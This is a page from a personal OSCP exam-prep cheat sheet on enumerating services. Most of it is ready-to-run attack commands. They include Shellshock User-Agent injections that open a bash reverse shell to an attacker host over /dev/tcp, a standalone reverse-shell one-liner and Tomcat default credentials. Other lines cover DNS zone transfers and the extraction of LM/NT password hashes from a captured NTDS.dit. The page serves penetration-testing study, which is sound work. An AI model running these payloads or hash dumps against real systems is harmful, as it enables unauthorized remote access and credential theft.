OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page
  • RPCBind Port 111
  • Apache Tomcat Port 8080
  • Port 4555
  • Shellshock Vulnerability
  • Port 53
  • DNS Zone Transfer
  • Active Directory / LDAP

Was this helpful?

  1. Recon (Scanning & Enumeration)
  2. Common Ports and Services

Other Services Enumeration

RPCBind Port 111

rpcinfo –p x.x.x.x

Apache Tomcat Port 8080

default credentials : tomcat s3cret

Port 4555

JAMES Remote Administration Tool 2.3.2

Shellshock Vulnerability

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x ip:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/1234 0>&1" ip/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
$ python shellshock.py payload=reverse rhost=ip lhost=ip lport=4444 pages=/cgi-bin/user.sh
https://www.exploit-db.com/exploits/34900
bash -i >& /dev/tcp/ip/8888 0>&1

shellshock Vulnerability
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ip/1234 0>&1 " http://ip:80/cgi-bin/user.sh

Port 53

dnsrecon -r 127.0.0.0/24 -n ip
dig axfr @ip
dig axfr bank.htb @ip

DNS Zone Transfer

nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Active Directory / LDAP

 ./dsusers.py datatable link_table extract --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john -- syshive 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

 /usr/local/bin/esedbexport -m tables 20170721114636_default_192.x.x.x 33_psexec.ntdsgrab._333512.dit
PreviousCommon Ports and ServicesNextDNS Zone Transfer Attack

Last updated 4 years ago

Was this helpful?